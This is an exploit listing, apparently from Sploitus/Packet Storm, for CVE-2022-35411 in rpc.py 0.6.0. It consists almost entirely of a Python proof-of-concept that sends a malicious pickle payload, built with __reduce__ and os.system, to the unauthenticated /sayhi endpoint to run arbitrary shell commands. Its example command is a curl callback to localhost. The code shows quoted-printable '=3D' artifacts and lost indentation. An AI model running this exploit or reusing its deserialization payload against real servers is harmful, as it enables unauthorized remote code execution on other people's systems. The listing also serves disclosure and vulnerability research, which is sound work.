Exploit for rpc.py 0.6.0 Remote Code Execution CVE-2022-35411

Name: Exploit for rpc.py 0.6.0 Remote Code Execution CVE-2022-35411
Rating: 5 (208 reviews)

2022-07-29 | CVSS 7.5

## https://sploitus.com/exploit?id=PACKETSTORM:167872
# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)  
# Google Dork: N/A  
# Date: 2022-07-12  
# Exploit Author: Elias Hohl  
# Vendor Homepage: https://github.com/abersheeran  
# Software Link: https://github.com/abersheeran/rpc.py  
# Version: v0.4.2 - v0.6.0  
# Tested on: Debian 11, Ubuntu 20.04  
# CVE : CVE-2022-35411  
  
import requests  
import pickle  
  
# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py  
  
HOST =3D "127.0.0.1:65432"  
  
URL =3D f"http://{HOST}/sayhi"  
  
HEADERS =3D {  
"serializer": "pickle"  
}  
  
  
def generate_payload(cmd):  
  
class PickleRce(object):  
def __reduce__(self):  
import os  
return os.system, (cmd,)  
  
payload =3D pickle.dumps(PickleRce())  
  
print(payload)  
  
return payload  
  
  
def exec_command(cmd):  
  
payload =3D generate_payload(cmd)  
  
requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)  
  
  
def main():  
exec_command('curl http://127.0.0.1:4321')  
# exec_command('uname -a')  
  
  
if __name__ =3D=3D "__main__":  
main()